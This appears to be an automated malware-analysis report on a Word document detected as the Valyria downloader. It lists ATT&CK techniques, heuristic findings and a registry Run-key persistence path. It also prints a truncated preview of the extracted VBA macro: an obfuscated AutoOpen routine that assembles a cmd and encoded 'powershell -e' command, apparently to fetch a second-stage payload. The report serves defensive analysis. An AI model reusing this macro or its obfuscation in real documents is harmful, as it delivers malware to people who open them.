MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a critical ClamAV detection for 'Doc.Downloader.Valyria-6666907-0', indicating it is a known downloader. The presence of an AutoOpen VBA macro strongly suggests malicious intent. The macro attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The reconstructed PowerShell command is 'powershell -e JA2A0A.wA9AG:AZ', and it also attempts to establish persistence via the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics 5
-
ClamAV: Doc.Downloader.Valyria-6666907-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6666907-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13450 bytes |
SHA-256: ef15e64ab66201288d44187037aadc179839cf11020464d2f8e8c8aedf7ed44c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JaqUcWRI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour Second(cWRrD) Hour Oct(6) Error Rnd(PYdErv) Error 4 Hour Second(wvZjA - wuLVp) VBA.Shell% KeyString(RPKnCkwwviBmY + wiPTssDNPJqFcR + vbKeyC + INMBCjjZmU + ojIqGiFI) + GANBviM + jRMsZMPsRB + iuNCMQvl + jlscLGAJIHs + qfLGODzsKa + wndqTX + VcqsvRtzv + LznisqSI + jDIRz + WoQJNiov + kpBLTuuG + LtMCIBWV + nAlCNHzM + qjdrpoGqUiB, 405745421 - 405745421 Hour CDate(PdMfaU) Error CVar(mRzcs) Hour CDate(99347 * ZXmFwp) End Sub Attribute VB_Name = "HEXOwmYKVY" Function iuNCMQvl() On Error Resume Next Hour Rnd(QqsLk) Hour HwCiQ Hour CCur(320744829) noQhPPPtF = "mD" + " " + "/V" + ":" + "On" + " " + " " + " " + " " + " " + " " + " " Hour Atn(UVZjiV) Hour wAwQzz Error Log(98) MTRihwnI = " " + " /C" + " " + " " + " " + CStr(Chr(PjMhYPSWkl + AMAXwEoZzqrIw + 34 + jJswcCvKNBLWY + zaUGKWlqH)) + " " + " " + " " + " " + "SEt" + " " + " " + "$" Hour BiVPW Error CStr(AhlBk) UAKFsqWQ = " " + " " + " " + " =p" + "ow" + "er" Error 40 Hour 511833049 Hour LsloUw uFOpICBzQ = "sTe" + "ll" + " " + "-" + "e" + " JA" + "B2A" + "G0A" + "." + "w" + "A9A" + "G" + ":AZ" Error Log(NOqYn) Error 90 Hour CVar(jvqHz) qtwQEnFWii = "Q" + "B3A" + "C0A" + "bw" + "BiA" + "G" + "o" + "A" + "Z" + "Q" Error GNmIE Hour AzKJsS EJWDjiMji = "BjA" + "HQ" + "A" + "[A" + "B" + "O" + "AG" Error Sin(373486435) Hour Second(40171 + RKWYo) Hour CCur(26) rplHHow = "U" + "Ad" + "A" + "Au" + "AF" + "cAZ" + "QB" + "iA" + "E" Hour Atn(HnFBT) Hour tvFCW MtZScqY = "MAb" + "AB" + "pAG" + "UA" + "b" + "1B" + "0AD" + "sAJ" + "AB)" + "A" Hour AjnwII Error 7946 RHDsivhwZF = "H" + "oAS" + "w" + "A9" + "AC" Error CByte(EuXdb) Error DztRBM AMwUPWuQOT = "c" + "A)" + "A" + "B0" + "AH" + "Q" + "Ac" Hour 4 Hour Sgn(164328543) iQFWHaNT = "AA" + "6A" + "C8" + "A" + "L" + "w" + "B" + "zAG" + "E" + "Ab" + "QBT" iuNCMQvl = noQhPPPtF + MTRihwnI + UAKFsqWQ + uFOpICBzQ + qtwQEnFWii + EJWDjiMji + rplHHow + MtZScqY + RHDsivhwZF + AMwUPWuQOT + iQFWHaNT Hour 405158709 Error mwAWY Hour Log(6134) End Function Function jlscLGAJIHs() On Error Resume Next Error 198 Hour KDjGmP Hour CVar(3747) WJhRbDoTv = "AG8" + "Ad" + "AB" + "vA" + "HkA" + ")QB" + "r" + "AGE" + "A" Hour Second(8) Error KTRAUz qCzlGSC = "bQB" + "TAC" + ":" + "AYw" + "BvA" Hour 6 Hour 5 Hour Log(oMQDX) mKnQFKcE = "G0A" + "Lw" + "B" + "0" + "AE" + "AA)" + "A" + "B" + "0A" Hour Round(iiVDWR) Error CByte(VYVoqh + ZDmuzX) Error CCur(MPruu * LquIi - mzdKn * zQKaz) bzwtvs = "H" + "QA" + "c" + "A" + "A" + "6A" + "C8" + "ALw" Error 375 Hour CBool(mVBvkU * BJYwnz) Hour CDate(zpoRph) wbupJGL = "BkA" + "GU" + "AbA" + "Bs" + "A" + "H" + "kAZ" + "QB0" + "A" + "G" + "sA)" + "Q" + "Bs" Hour LCase(TPMlS * lJjqo - 98636 + NYlnF) Hour 9307 ViRuWWiKwd = "AG" + "kA" + "cwB" + "l" + "A" + "H[" + "A" + "d1B" jlscLGAJIHs = WJhRbDoTv + qCzlGSC + mKnQFKcE + bzwtvs + wbupJGL + ViRuWWiKwd Error QqiSA Error Hex(9117 * YOaHzr) End Function Function qfLGODzsKa() On Error Resume Next Hour vCqVB Error TypeName(9324) LQzGzzGSh = "pA" + "HMA" + "L1" + "Bj" + "AG8" + "Ab" + "QAv" + "AG" + "UAS" + "wA3" Hour 232358572 Hour Hex(35451 + tEtwwQ - aqwKL - tOiZz) FcWRhv = "A" + "EA" + "A)A" + "B0A" + "HQ" + "AcA" + "A6" + "AC8" + "AL" + "w" + "B" Hour CBool(GapYw / LRsNFa) Error wPAQzO Error Str(NusIbq) wjiuC = "@A" + "HUA" + "cw" + "BpA" + "GMA" + "YQ" + "B" + "sA" Error Log(wCTrk) Error NPuHdw OMzWPKGj = "GMA" + ")AB" + "v" + "AH" + "[" + "Ad" + "QBz" Error CDate(2736) Hour Str(9) jYzabEwWW = "AC" + ":AY" + "w" + "Bv" + "AG0" Error 289902822 Hour CByte(287) OTZOjO = "A" + "L" + "1" + "Bi" + "AH" + "[A" + "LwA" + "2AE ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.